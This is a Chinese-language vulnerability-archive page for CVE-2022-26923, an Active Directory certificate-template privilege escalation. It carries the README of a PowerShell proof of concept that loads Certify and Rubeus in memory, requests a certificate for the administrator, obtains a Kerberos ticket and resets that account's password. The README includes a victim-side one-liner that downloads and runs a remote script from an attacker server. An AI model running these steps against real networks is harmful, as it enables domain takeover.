关联漏洞
标题:
Microsoft Windows Active Directory 信任管理问题漏洞
(CVE-2022-26923)
描述:Microsoft Windows Active Directory是美国微软(Microsoft)公司的一个负责架构中大型网络环境的集中式目录管理服务。存储有关网络上对象的信息,并使管理员和用户可以轻松查找和使用这些信息。 Microsoft Windows Active Directory存在信任管理问题漏洞。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Syst
描述
A powershell poc to load and automatically run Certify and Rubeus from memory.
介绍
# CVE-2022-26923-Powershell-POC
A powershell poc to load and automatically run Certify and Rubeus from memory.
# How it works?
1. Loads Certify.exe and Rubeus.exe in memory.
2. Scans the target machine for misconfigured certificate templates. (more on https://www.youtube.com/watch?v=HBRCI5O35R8)
3. Request a certificate for the Administrative user, based on the vulnerable template.
4. Sends the certificate to the certificate handler, it translates it to .pfx format and sends it back to the client.
5. Utilizing Rubeus to load the certificate and generate a ticket for the Administrative user.
6. Changes the password of the Administrative user. (Just for the demo)
The POC is tested on the following TryHackMe Labs: https://tryhackme.com/room/adcertificatetemplates
This CVE is used for privilege escalation, so no initial exploitation is covered on this demo, nor the THM Lab.
Steps:
1. python3 -m http.server 80 [Attacker Box]
2. python3 uploader.py 8000 [Attacker Box]
3. IEX(New-Object Net.WebClient).DownloadString('http://IP/poc.ps1') [Victim Box]
Note: This POC is for educational purpose, you are responsible for your own actions.
文件快照
[4.0K] /data/pocs/adb5c92c3b5685529e32231207081f57ae618224
├── [803K] poc.ps1
├── [1.1K] README.md
└── [2.0K] uploader.py
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。